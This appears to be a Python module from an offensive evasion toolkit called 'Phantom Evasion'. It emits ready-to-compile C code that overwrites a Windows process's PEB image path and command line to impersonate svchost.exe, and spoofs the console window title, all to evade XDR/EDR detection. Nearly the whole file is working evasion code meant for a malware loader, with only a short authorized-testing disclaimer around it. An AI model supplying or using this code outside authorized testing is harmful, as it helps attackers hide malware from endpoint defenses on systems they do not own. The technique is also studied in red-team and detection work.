"""
Phantom Evasion - Process Masquerading (PEB Manipulation)

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_process_masquerade() -> Dict[str, Any]:
    """Generate C code to modify PEB fields to masquerade the process identity.

    XDR/EDR products read ``PEB.ProcessParameters.ImagePathName`` and
    ``CommandLine`` to identify the running process.  By overwriting these
    Unicode strings in-place the loader can impersonate a legitimate process
    (e.g., ``svchost.exe``) without actually being that process.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// Process Masquerading – PEB Field Manipulation
// Generated by Phantom Evasion – Layer 4 – XDR Evasion

#ifndef PHANTOM_PROCESS_MASQUERADE_INCLUDED
#define PHANTOM_PROCESS_MASQUERADE_INCLUDED

#include <windows.h>

/**
 * Overwrite PEB.ProcessParameters.ImagePathName and CommandLine
 * with *fake_image_path* and *fake_cmdline* respectively.
 *
 * NOTE: The strings MUST remain accessible for the lifetime of the process.
 *       Pass static or heap-allocated wide strings.
 */
static void masquerade_peb(const wchar_t *fake_image_path,
                            const wchar_t *fake_cmdline) {
    PPEB peb = (PPEB)__readgsqword(0x60);
    PRTL_USER_PROCESS_PARAMETERS params = peb->ProcessParameters;

    // ── ImagePathName ────────────────────────────────────────────────────────
    if (fake_image_path) {
        SIZE_T path_bytes = (wcslen(fake_image_path) + 1) * sizeof(wchar_t);
        LPVOID new_path   = HeapAlloc(GetProcessHeap(), 0, path_bytes);
        if (new_path) {
            memcpy(new_path, fake_image_path, path_bytes);
            params->ImagePathName.Buffer        = (PWSTR)new_path;
            params->ImagePathName.Length        = (USHORT)(path_bytes - sizeof(wchar_t));
            params->ImagePathName.MaximumLength = (USHORT)path_bytes;
        }
    }

    // ── CommandLine ──────────────────────────────────────────────────────────
    if (fake_cmdline) {
        SIZE_T cmd_bytes = (wcslen(fake_cmdline) + 1) * sizeof(wchar_t);
        LPVOID new_cmd   = HeapAlloc(GetProcessHeap(), 0, cmd_bytes);
        if (new_cmd) {
            memcpy(new_cmd, fake_cmdline, cmd_bytes);
            params->CommandLine.Buffer        = (PWSTR)new_cmd;
            params->CommandLine.Length        = (USHORT)(cmd_bytes - sizeof(wchar_t));
            params->CommandLine.MaximumLength = (USHORT)cmd_bytes;
        }
    }
}

// ── Window title spoofing ────────────────────────────────────────────────────
static void spoof_window_title(const wchar_t *title) {
    // SetConsoleTitleW changes what appears in task manager for console apps
    SetConsoleTitleW(title);
}

// Example usage:
//   masquerade_peb(L"C:\\Windows\\System32\\svchost.exe",
//                  L"svchost.exe -k NetworkService");
//   spoof_window_title(L"Windows Service Host");

#endif /* PHANTOM_PROCESS_MASQUERADE_INCLUDED */
"""

    return {
        "code": code,
        "description": "PEB masquerading (ImagePathName + CommandLine overwrite) + window title spoof",
        "layer": "Layer 4 - XDR Evasion",
        "name": "process_masquerade",
    }
